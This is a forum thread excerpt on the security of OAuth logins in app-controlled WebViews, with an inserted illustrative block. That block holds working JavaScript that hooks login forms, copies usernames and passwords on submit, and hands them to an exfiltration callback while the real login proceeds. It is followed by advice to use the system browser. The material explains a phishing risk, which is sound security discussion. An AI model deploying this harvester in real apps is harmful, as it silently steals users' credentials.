
If the app is displaying its own internal web view for OAuth, it can load any page it wants in there and tell the user it's Twitter. It can even fake an address bar with a twitter.com URL if it wants. Then use the common phishing technique of 'oops, you must have entered your password wrong' (the user didn't, but now the phisher has it), followed by a forward to the real site so the user suspects nothing.

But this is hypothetical. In reality there is little motivation for apps in an App Store-like environment, which survive on customer goodwill, to want to do this.

The user's security is probably not why Twitter chose OAuth.




It doesn't even need to be that complicated. They could literally show the real OAuth flow, and inject a script into the page (since they control the WebView) that harvests the username/password. No "oops you got it wrong", no risk of visual inaccuracies.
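What that injected script would look like, as an added example that is not part of the thread and not code from any real app. A malicious host app that renders the genuine provider login page in its own WebView can run a payload like this once the page has loaded (on Android, for instance, from `WebViewClient.onPageFinished` via `WebView.evaluateJavascript`); the hook copies the credential fields on submit and lets the real submission proceed, so the user sees a normal, successful login. `installHarvester`, `exfiltrate`, and the `docLike` parameter are names chosen for this illustration; in a real WebView `docLike` would be `document`. The login page DOM below is a constructed stand-in so the example runs offline in Node.

```javascript
// Added example, not from the original thread: the form-hooking payload a
// malicious app could inject into its own WebView after the real OAuth login
// page loads. Names are illustrative assumptions.
function installHarvester(docLike, exfiltrate) {
  const captured = [];
  for (const form of Array.from(docLike.querySelectorAll('form'))) {
    form.addEventListener('submit', () => {
      const fields = {};
      for (const input of Array.from(form.querySelectorAll('input'))) {
        const name = input.name || input.id;
        if (!name) continue;
        // Keep anything that looks like a credential; skip CSRF tokens etc.
        if (input.type === 'password' || /user|email|login|pass|pwd/i.test(name)) {
          fields[name] = input.value;
        }
      }
      if (Object.keys(fields).length > 0) {
        captured.push(fields);
        exfiltrate(fields); // in practice a silent fetch() to the app's own server
      }
      // Deliberately no preventDefault(): the real POST goes through unchanged,
      // so the provider logs the user in and nothing looks wrong.
    });
  }
  return captured;
}

// Constructed stand-in for the provider's login page DOM (assumption: generic
// field names), just enough of the DOM API for installHarvester to run offline.
function makeFakeLoginPage() {
  const submitListeners = [];
  const inputs = [
    { name: 'username', type: 'text', value: 'alice' },
    { name: 'password', type: 'password', value: 'hunter2' },
    { name: 'authenticity_token', type: 'hidden', value: 'tok123' },
  ];
  const form = {
    querySelectorAll: (sel) => (sel === 'input' ? inputs : []),
    addEventListener: (evt, fn) => { if (evt === 'submit') submitListeners.push(fn); },
    submit: () => submitListeners.forEach((fn) => fn({})),
  };
  return { querySelectorAll: (sel) => (sel === 'form' ? [form] : []), form };
}

// Runs the payload against the fake page and returns what the attacker received.
function demo() {
  const page = makeFakeLoginPage();
  const stolen = [];
  installHarvester(page, (fields) => stolen.push(fields));
  page.form.submit(); // the user clicks "Log in" on the genuine page
  return stolen;
}
```

Nothing on the provider's side can detect this: the page, the script, and the network traffic are all exactly what a legitimate login looks like, and a User-Agent check is no help because the host app also controls the WebView's UA string. The only real mitigation is the one the thread is circling: do not authenticate inside an app-controlled WebView at all, but hand the OAuth flow to the system browser (or the platform's browser-backed auth session) whose page the app cannot script.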


> But this is hypothetical. In reality there is little motivation for apps in an App Store-like environment, which survive on customer goodwill, to want to do this.

Would anybody ever find out though?

It's clear that the App Store does no real checking of the apps they accept. Since use of the GUID was banned, everyone has just switched to the just-as-unique MAC address to identify devices.



